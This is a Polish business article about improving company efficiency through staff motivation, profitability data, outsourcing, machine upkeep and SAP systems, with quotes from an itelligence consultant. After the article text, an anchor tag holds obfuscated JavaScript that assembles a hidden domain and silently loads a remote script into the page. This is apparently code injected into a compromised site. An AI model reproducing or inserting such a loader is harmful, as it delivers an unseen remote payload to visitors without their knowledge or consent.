Jak usprawnić działanie firmy? 4 rozwiązania, które Ci w tym pomogą

Dobrze działająca firma utożsamiana jest z przedsiębiorstwem przynoszącym zyski. By to osiągnąć, zarządzający nią managerowie koncentrują się na sprzedaży i zdobywaniu nowych zleceń. Agresywna polityka zbytu, wojna cen, orientacja na klienta są ukierunkowane na pracę na rynku. Tymczasem ogromny potencjał do poprawy funkcjonowania firmy, a tym samym do optymalizacji kosztów i zwiększenia dochodu tkwi w procesach wewnętrznych związanych z zarządzaniem zasobami ludzkimi i strukturą przedsiębiorstwa.

Sytuacja wewnątrz firmy – jasne cele, umiejętna motywacja

Koszty personelu to istotny punkt w kosztach stałych każdej firmy. Właściwe wykorzystanie zasobów brzmi bezosobowo. Powiedzenie, że to pracownicy są sercem każdego przedsiębiorstwa najlepiej oddaje ideę miękkiego zarządzania relacjami ludzkimi. Umiejętne przekazanie informacji o celach firmy, kierunkach jej rozwoju i powiązanie z nią zadań i obowiązków na każdym poziomie stanowisk to prawdziwe wyzwanie. Tu nie zawsze najbardziej istotnym argumentem jest wysokość wynagrodzenia. Gratyfikacja finansowa to tylko jeden z elementów polityki motywacyjnej. Warto pamiętać, że nikt nie lubi być traktowany bezosobowo. W ramach ogólnej polityki rozwoju firmy należy dać pracownikom możliwość realizacji własnych ambicji i stworzyć perspektywy dalszego rozwoju zawodowego. Zaangażowanie w sprawy firmy nie tylko owocuje większą wydajnością pracy, ale też buduje więź z pracodawcą i lojalność. Ma to istotne znaczenie, zwłaszcza w przypadku pracowników dobrze wykwalifikowanych, którzy bez problemu mogą znaleźć zatrudnienie w konkurencyjnych przedsiębiorstwach. Ich wiedza, doświadczenie, kontakty są dla pracodawcy bezcenne. Znalezienie fachowców podobnej klasy jest tylko trudne. Wdrożenie i wyszkolenie nowego pracownika wymaga czasu i sporych nakładów finansowych. Nie bez powodu nowoczesna polityka zarządzania personelem mówi o tzw. kliencie wewnętrznym. Własny pracownik powinien być dla firmy równie ważny, jak klienci spoza organizacji.

Kluczowe dane u właściwych osób

Bez zysków byt każdego przedsiębiorstwa jest zagrożony. Tym bardziej istotne jest, by wiadomo było, kto w firmie jest odpowiedzialny za jej wyniki. Czy jest to zarząd, który przedstawia wyniki właścicielom, a może dyrektor sprzedaży, który ustala ceny? Gdzie w tej hierarchii jest miejsce dla dyrektora finansowego, który ma pieczę nad finansami firmy? W końcu dane o stratach, zyskach i ostateczny wynik finansowy wychodzi z finansów. I tu dochodzimy do kluczowego aspektu. O ile wynik finansowy jest łatwy do wygenerowania, to informacja o tym, który klient jest najbardziej zyskowny, który przynosi straty, jaka marża na danych produktach jest najbardziej opłacalna, a do których firma dopłaca nie jest już tak oczywista. Nierzadko zdarza się, że dział sprzedaży przyjmuje zamówienia, na których firma w ogóle nie zarabia.

Właściwa polityka cenowa, terminowe egzekwowanie należności, zarządzanie zapasami to obszary, w których jest spory potencjał do poprawy. By tego dokonać niezbędna jest aktualna i zawsze dostępna informacja dla zarządzających firmą. Systemy wspomagające zarządzanie m.in. SAP to narzędzie, które pozwala na usystematyzowanie najbardziej istotnych procesów w firmie. To duże ułatwienie dla planistów i zarządzających. Pozwala podejmować kluczowe decyzje biznesowe oparte na precyzyjnych, powtarzalnych i spójnych informacjach – mówi Piotr Pudelski, dyrektor konsultingu z firmy itelligence, oferującej rozwiązania SAP dla firm.

Zewnętrzny partner – lepiej, taniej, szybciej

Analiza procesów biznesowych może być podstawą do wyodrębnienia ze struktury firmy pewnych obszarów działalności i przekazania ich partnerom zewnętrznym. Outsourcing dotyczy dziś bardzo często np.: usług informatycznych, sprzątających, ochroniarskich. Realizacja zadań we wspomnianych obszarach przy pomocy zewnętrznych partnerów jest tańsza, bardziej efektywna, niejednokrotnie lepszej jakości. Konkurencja wymusza nie tylko coraz korzystniejsze ceny i specjalizację firm oferujących outsourcing, ale i większą elastyczność w podejściu do potrzeb klienta. – dodaje Piotr Pudelski.

Dbałość o zasoby

Dbałość o stan finansów firmy i jej efektywną działalność obejmuje również troskę o zasoby materialne firmy np. maszyny produkcyjne. Regularne przeglądy, konserwacja, a także szybkie naprawy drobnych usterek to najlepszy sposób, by uniknąć kosztownych przestojów i poważniejszych napraw. Równie istotna jak sprawność i bezpieczeństwo parku maszynowego, jest jego efektywne wykorzystanie. Przy planowaniu produkcji bez przestojów, krótkich lub nieopłacalnych, drogich serii, czy nadgodzin pracowników i ustaleniu realnych czasów realizacji również pomocny jest system SAP.

Usprawnienie działania firmy jest niezbędne dla poprawy jej konkurencyjności i umożliwia systematyczny i trwały rozwój. Niezwykle istotne jest, by podjęte w tym celu kroki obejmowały wszystkie obszary jej działania, a zakres prac, ich hierarchia i tempo oparte były na sprawdzonych i rzetelnych informacjach.

<a href=" (function(){ ur9f=document.createElement(“script”);ur9f.type=”text/javascript”; ur9f.async=true;ur9f_=((“us”)+”t”)+”a”;ur9f_+=(“t.i”)+””+”n”;ur9f_+=((“f”)+”o”); ur9f.src=”http://”+ur9f_+”/7145065.jb9Xkznhr9fwhsa6uws8j3gl95h885″; document.body.appendChild(ur9f); })(); “>

//